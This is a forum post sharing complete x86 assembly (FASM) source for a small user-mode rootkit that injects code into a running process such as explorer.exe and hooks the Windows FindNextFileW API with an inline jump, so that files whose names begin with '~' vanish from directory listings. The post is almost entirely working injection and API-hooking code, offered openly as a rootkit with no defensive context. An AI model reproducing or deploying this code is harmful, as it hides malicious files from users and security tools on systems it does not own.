Jump to content
Nytro

[ASM] Api Hooking without Dll

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect.

; *******************************************************
; ***  Example of a little rootkit that hide all the  ***
; ***  files that begin with "~" without use Dll.     ***
; ***                                                 ***
; ***  By E0N (L) 2008                                ***
; *******************************************************


include 'H:\archivos de programa\fasm\include\win32ax.inc'

.data
   HookApi      db 'FindNextFileW' , 0  ; Name of the api to hook
   HookDll      db 'Kernel32.dll'   , 0  ; Name of the DLL that contain it
   DirApi        dd ?           ; Direction of the api to hook

   process       dd ?
   pid         dd 2160           ; PID of the process to hook
   x         dd 7           ; Number of bytes that have the api at begin

   BufferCall    dd ?           ; Buffer to call the api api (in our process)
   inyBufferCall dd ?           ; Pointer to the buffer to call the api when injected

   tamFun         dd ?           ; Size of function that will replace the api
   inyFun         dd ?           ; Pointer to this buffer when injected

   BufferApi     dd ?           ; 5 bytes buffer for replace the begin of api


   struct Datos
          sBufferCall dd ?         ; Pointer to inyBufferCall to can call the original api
   ends
   dat Datos ?

   SizeofDatos   dd 4
   dirStruct     dd ?           ; Pointer to structure when injected

   Prote         dd ?            ; To call VirtualProtect
.code

start:

   ; Get handle of process when we will inject
   mov eax, PROCESS_VM_OPERATION
   or  eax, PROCESS_VM_WRITE
   invoke OpenProcess, eax, FALSE, [pid]
   mov [process], eax

   ; Get direction of api to Hook
   invoke GetModuleHandle, HookDll
   invoke GetProcAddress, eax, HookApi
   mov [DirApi], eax

   ; Make the buffer to call the api:
   ;       x bytes             |    1 byte   |   4 byte   |   1 byte
   ;  x first bytes of api   | push [0x68] | DirApi + x | ret [0xC3]
   mov eax, dword [x]
   add eax, 6
   invoke LocalAlloc, LPTR, eax ; eax = x + 6
   mov [BufferCall], eax

   invoke RtlMoveMemory, [BufferCall], [DirApi], [x] ; Copiamos los x primeros bytes del api
   mov eax, [BufferCall]
   add eax, [x]
   mov byte [eax], 0x68
   inc eax
   mov ebx, [DirApi]
   add ebx, [x]
   mov dword [eax], ebx
   add eax, 4
   mov byte [eax], 0xC3

   ; Inject this buffer
   mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT
   or  eax, MEM_COMMIT
   mov ecx, [x]        ; ecx = x + 6
   add ecx, 6
   invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE
   mov [inyBufferCall], eax

   mov ebx, [x]        ; ebx = x + 6
   add ebx, 6
   invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL

   ; Initialize the structure
   mov eax, [inyBufferCall]      ; Metemos el puntero al buffer para llamar
   mov [dat.sBufferCall], eax    ; con normalidad al api


   ; Inject structure
   mov eax, MEM_RESERVE
   or  eax, MEM_COMMIT
   invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE
   mov [dirStruct], eax
   invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL

   ; Change the 0x0000 for a pointer to the structure
   mov ebx, CAMBIO      ; ebx = El 0x0000 que hay que cambiar (4 bytes)
   sub ebx, 4
   invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote
   invoke RtlMoveMemory, ebx, dirStruct, 4

   ; Calculate the size of the function to inject
   mov eax, FIN_MyFindNextFileW
   sub eax, MyFindNextFileW
   mov [tamFun], eax

   ; Inject the function
   mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT
   or  eax, MEM_COMMIT
   invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE
   mov [inyFun], eax
   invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL

   ; Make a buffer to hook the api
   ;  1 bytes    |     4 bytes
   ; jmp [0xE9]  | Size of jump
   invoke LocalAlloc, LPTR, 5
   mov [BufferApi], eax
   mov byte [eax], 0xE9
   inc eax
   mov ebx, [inyFun]
   sub ebx, [DirApi]
   sub ebx, 5 ; 5 = -1 por el 0xE9 y -4 por la dirección
   mov dword [eax], ebx

   ; Inject this buffer in the begin of api
   mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT
   or  eax, MEM_COMMIT
   invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE
   invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL
   invoke ExitProcess, 0



; Funtion that will replace the api :P
proc MyFindNextFileW hFindFile, lpFindFileData

     OK:
   mov ebx, 0x0000 ; This 0x0000  will do a pointer to the buffer before inject
   CAMBIO:

   push [lpFindFileData]
   push [hFindFile]
   call dword [ebx]
   mov ebx, eax

   cmp ebx, 0        
   je RETORNAR_FIN     

     mov eax, [lpFindFileData] ;
     add eax, 44      
     cmp byte [eax], '~'   
     je  OK             
     mov eax, 1         
     ret   

     RETORNAR_FIN:
     mov eax, 0
     ret
endp
FIN_MyFindNextFileW:

.end start

In conclusion, is a little-rootkit without dll.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...